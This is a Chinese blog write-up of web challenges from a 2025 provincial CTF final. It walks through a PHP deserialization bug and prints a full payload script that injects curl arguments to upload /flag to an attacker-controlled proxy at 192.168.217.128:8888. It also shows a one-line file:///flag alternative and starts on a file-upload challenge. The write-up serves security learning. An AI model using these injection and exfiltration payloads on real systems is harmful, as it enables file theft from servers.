<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="前言 还是太弱了，最后看提示才防住了一道题，队友很早的时候就看到了一个原题，直接猛拿巨多分，还好混了个二等奖。 这里没有java题，主要是积累一">
<title>2025江西信息技术省赛决赛</title>

<link rel='canonical' href='http://localhost:1313/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/'>

<link rel="stylesheet" href="/scss/style.min.663803bebe609202d5b39d848f2d7c2dc8b598a2d879efa079fa88893d29c49c.css"><meta property='og:title' content="2025江西信息技术省赛决赛">
<meta property='og:description' content="前言 还是太弱了，最后看提示才防住了一道题，队友很早的时候就看到了一个原题，直接猛拿巨多分，还好混了个二等奖。 这里没有java题，主要是积累一">
<meta property='og:url' content='http://localhost:1313/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/'>
<meta property='og:site_name' content='liernian'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2025-11-16T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2025-11-16T00:00:00&#43;00:00'/>
<meta name="twitter:title" content="2025江西信息技术省赛决赛">
<meta name="twitter:description" content="前言 还是太弱了，最后看提示才防住了一道题，队友很早的时候就看到了一个原题，直接猛拿巨多分，还好混了个二等奖。 这里没有java题，主要是积累一">
    <link rel="shortcut icon" href="/favicon.ico" />

  


    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu11319725144555339807.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">💯</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">liernian</a></h1>
            <h2 class="site-description">理想主义的中二少年</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://twitter.com'
                        target="_blank"
                        title="Twitter"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-twitter" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E9%93%BE%E6%8E%A5/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>链接</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">
                    
                        <li id="i18n-switch">  
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-language" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M4 5h7" />
  <path d="M9 3v2c0 4.418 -2.239 8 -5 8" />
  <path d="M5 9c-.003 2.144 2.952 3.908 6.7 4" />
  <path d="M12 20l4 -9l4 9" />
  <path d="M19.1 18h-6.2" />
</svg>



                            <select name="language" title="language" onchange="window.location.href = this.selectedOptions[0].value">
                                
                                    <option value="http://localhost:1313/en/" >English</option>
                                
                                    <option value="http://localhost:1313/" selected>简体中文</option>
                                
                                    <option value="http://localhost:1313/ar/" >عربي</option>
                                
                            </select>
                        </li>
                    
                

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>暗色模式</span>
                    </li>
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#前言">前言</a></li>
    <li><a href="#信息">信息</a></li>
    <li><a href="#服务">服务</a></li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/wp/" >
                Wp
            </a>
        
            <a href="/categories/web/" >
                Web
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/">2025江西信息技术省赛决赛</a>
        </h2>
    
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">2025-11-16</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    阅读时长: 4 分钟
                </time>
            </div>
        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <h2 id="前言">前言
</h2><p>还是太弱了，最后看提示才防住了一道题，队友很早的时候就看到了一个原题，直接猛拿巨多分，还好混了个二等奖。</p>
<p>这里没有java题，主要是积累一下代码审计的能力</p>
<h2 id="信息">信息
</h2><p>目录结构是这样的</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153347741.png"
	width="251"
	height="320"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153347741_hu16050927080149216463.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153347741_hu1663330479537229471.png 1024w"
	loading="lazy"
	
		alt="image-20251116153347741"
	
	
		class="gallery-image" 
		data-flex-grow="78"
		data-flex-basis="188px"
	
></p>
<p>直接用Seay扫的话能在class.php扫到一个命令执行，但是这个命令执行的cmd明显是不能由我们自己定义的，看起来像一个ssrf。这里可以留一个心眼。</p>
<p>我发现真的是ai用多了脑子会用坏，这里明显可以命令注入，只要加一个分隔符就好</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153553742.png"
	width="1112"
	height="358"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153553742_hu6481722311863585685.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116153553742_hu11982339043928663889.png 1024w"
	loading="lazy"
	
		alt="image-20251116153553742"
	
	
		class="gallery-image" 
		data-flex-grow="310"
		data-flex-basis="745px"
	
></p>
<p>我们首先要了解这个项目是用来干什么的。</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116154012499.png"
	width="1137"
	height="820"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116154012499_hu5411907888383790062.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116154012499_hu7860682330377234893.png 1024w"
	loading="lazy"
	
		alt="image-20251116154012499"
	
	
		class="gallery-image" 
		data-flex-grow="138"
		data-flex-basis="332px"
	
></p>
<p>首先login.php这里有一个sql的功能点，当初我还在这里上了waf，但是没有鸟用。</p>
<p>仔细看了代码以为可以用万能钥匙绕过，但是本地跑不通。后面说是直接给了账号和密码，这里可能是出题有问题。</p>
<p>所以我们直接走到admin.php和class.php</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191444283.png"
	width="1520"
	height="524"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191444283_hu6329667638200707288.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191444283_hu812220505999693245.png 1024w"
	loading="lazy"
	
		alt="image-20251116191444283"
	
	
		class="gallery-image" 
		data-flex-grow="290"
		data-flex-basis="696px"
	
></p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191521631.png"
	width="1260"
	height="1009"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191521631_hu2976987427895003281.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116191521631_hu14999495695460542514.png 1024w"
	loading="lazy"
	
		alt="image-20251116191521631"
	
	
		class="gallery-image" 
		data-flex-grow="124"
		data-flex-basis="299px"
	
></p>
<p>可以看到进admin.php的时候首先会判断session admin是否为1，然后再反序列化cookie的user值。所以重点就是前面提到的命令注入了。</p>
<p>这里因为<code>escapeshellcmd</code>的存在，不能像普通分号那样直接分割命令</p>
<p>否则会变成这样</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116195720302.png"
	width="627"
	height="453"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116195720302_hu1815920912597293210.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116195720302_hu10744745223774232238.png 1024w"
	loading="lazy"
	
		alt="image-20251116195720302"
	
	
		class="gallery-image" 
		data-flex-grow="138"
		data-flex-basis="332px"
	
></p>
<p>我们构造一下payload，这里主要是要清楚curl命令的格式，然后弹出来。比赛期间都是同一局域网，也是可以弹的</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">user</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$username</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$age</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$introdution</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$blog</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="nv">$is_admin</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__construct</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">username</span> <span class="o">=</span> <span class="s1">&#39;ctfer&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">age</span> <span class="o">=</span> <span class="mi">18</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">introdution</span> <span class="o">=</span> <span class="s1">&#39;I am a ctfer&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">blog</span> <span class="o">=</span> <span class="s1">&#39;www.ctfer.com&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">is_admin</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="nf">update</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">username</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">age</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;age&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">introdution</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;introdution&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">        <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">blog</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;blog&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__destruct</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">is_admin</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">echo</span> <span class="s2">&#34;This is your blog ,dear admin!&lt;/br&gt;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$cmd</span> <span class="o">=</span> <span class="s2">&#34;curl &#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$cmd</span> <span class="o">=</span>  <span class="nv">$cmd</span><span class="o">.</span><span class="nx">escapeshellcmd</span><span class="p">(</span><span class="nx">escapeshellarg</span><span class="p">(</span><span class="s2">&#34;http://&#34;</span><span class="o">.</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">blog</span><span class="p">));</span>
</span></span><span class="line"><span class="cl">            <span class="nx">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">public</span> <span class="k">function</span> <span class="fm">__wakeup</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="c1">// 反序列化后默认无操作
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nv">$user</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">user</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="nv">$user</span><span class="o">-&gt;</span><span class="na">is_admin</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nv">$user</span><span class="o">-&gt;</span><span class="na">blog</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1/&#39; -F file=@/flag -x 192.168.217.128:8888 -A a=1 &#39;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">//echo serialize($user);
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="k">echo</span> <span class="nx">base64_encode</span><span class="p">(</span><span class="nx">serialize</span><span class="p">(</span><span class="nv">$user</span><span class="p">));</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116201246269.png"
	width="2325"
	height="1176"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116201246269_hu4993813729931661923.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251116201246269_hu5606400690076111664.png 1024w"
	loading="lazy"
	
		alt="image-20251116201246269"
	
	
		class="gallery-image" 
		data-flex-grow="197"
		data-flex-basis="474px"
	
></p>
<p>然后上了这道题到娱乐赛里，结果被师兄秒了，师兄打了一个</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&#34;&#39; file:///flag &#39;&#34;
</span></span></code></pre></td></tr></table>
</div>
</div><p>给我看傻了</p>
<h2 id="服务">服务
</h2><p>项目结构为</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120192737900.png"
	width="274"
	height="338"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120192737900_hu6795257751791147113.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120192737900_hu15804337092422524571.png 1024w"
	loading="lazy"
	
		alt="image-20251120192737900"
	
	
		class="gallery-image" 
		data-flex-grow="81"
		data-flex-basis="194px"
	
></p>
<p><code>index.php</code>是一个纯前端，页面时企业上传文件页面，<code>uploadforms.php</code>也是一个纯前端页面，用于上传文件</p>
<p>用小皮启一下这个网站，简单使用过后发现，上传的文件会被改变文件名，然后又查看文件，删除文件的功能</p>
<p>既然是文件上传，我们先看看upload.php的逻辑</p>
<p><img src="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120193809862.png"
	width="1195"
	height="824"
	srcset="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120193809862_hu8078089389302846891.png 480w, /p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/image-20251120193809862_hu15075266980564292160.png 1024w"
	loading="lazy"
	
		alt="image-20251120193809862"
	
	
		class="gallery-image" 
		data-flex-grow="145"
		data-flex-basis="348px"
	
></p>
<p>没啥特别的，就是有一个黑名单，<code>ph</code>，<code>ht</code>，<code>user</code>，<code>gz</code>不允许上传，</p>
<p>然后看看<code>view_file.php</code>，也没啥特别的，也防止了file直接读取flag。就是创建了一个file的对象，这里包含了的是<code>class.php</code>，所以这个类应该是在<code>class.php</code>中</p>
